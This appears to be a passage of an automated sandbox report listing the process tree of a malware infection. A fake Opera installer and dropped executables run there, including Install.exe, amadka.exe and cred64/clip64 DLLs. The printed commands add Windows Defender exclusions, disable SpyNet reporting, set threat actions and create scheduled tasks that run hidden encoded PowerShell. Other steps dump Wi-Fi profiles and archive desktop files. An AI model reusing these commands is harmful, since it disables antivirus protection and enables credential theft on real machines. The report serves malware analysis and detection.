C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exeC:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2c8,0x2f8,0x6eb221f8,0x6eb22204,0x6eb222105⤵
- Executes dropped EXE
- Loads dropped DLL
PID:724
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CYoOmU856pwWKZXiUIbstHLU.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CYoOmU856pwWKZXiUIbstHLU.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5292
-
-
C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe"C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5144 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240325074516" --session-guid=de567c8c-8381-4352-b79c-a3314fbe7a72 --server-tracking-blob=MWFkY2RkOTFhZDAyMzBlZWIyZDc1OTY0OTI1NmY4Y2MxNzg5ZjNiZTRhOTJhNDZjMTgxNTA0N2M2YTk1YTY2Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTM1MjcwOC4zODEyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJhMDQ3M2ExYS04OTBiLTRiNWQtYThlMi1hN2ViMWYwODhhMjUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:5124 -
C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exeC:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2f8,0x6e1621f8,0x6e162204,0x6e1622106⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2308
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6852 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250745161\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x430040,0x43004c,0x4300586⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6928
-
-
-
-
C:\Users\Admin\Pictures\PjnBLsCrGzwfVavcntySi6CQ.exe"C:\Users\Admin\Pictures\PjnBLsCrGzwfVavcntySi6CQ.exe"4⤵
- Executes dropped EXE
PID:5444 -
C:\Users\Admin\AppData\Local\Temp\7zSE639.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:5552 -
C:\Users\Admin\AppData\Local\Temp\7zSEA12.tmp\Install.exe.\Install.exe /BCdnbdidxxMl "385118" /S6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:6120 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:5524
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5272
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:5296
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:5356
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:2132
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:2208
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:3272
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:5184
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:4272
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwQQhYUmu" /SC once /ST 05:59:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
PID:5496 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2280
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwQQhYUmu"7⤵PID:5428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5184
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwQQhYUmu"7⤵PID:7148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 07:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\OrUtnSx.exe\" id /Jcsite_idWGg 385118 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3504
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5184
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:6072 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:6136 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5852
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4964 -ip 49641⤵PID:4680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2280 -ip 22801⤵PID:5552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 568 -ip 5681⤵PID:2196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5836 -ip 58361⤵PID:3316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5836 -ip 58361⤵PID:6016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:6288
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5840
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:7096
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:528
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\77CB.bat" "1⤵PID:5852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 12⤵PID:6316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 46681⤵PID:4720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5260 -ip 52601⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\OrUtnSx.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\OrUtnSx.exe id /Jcsite_idWGg 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6768
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:6464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:7104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:6616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:7056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:6536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:6980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:6696
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD 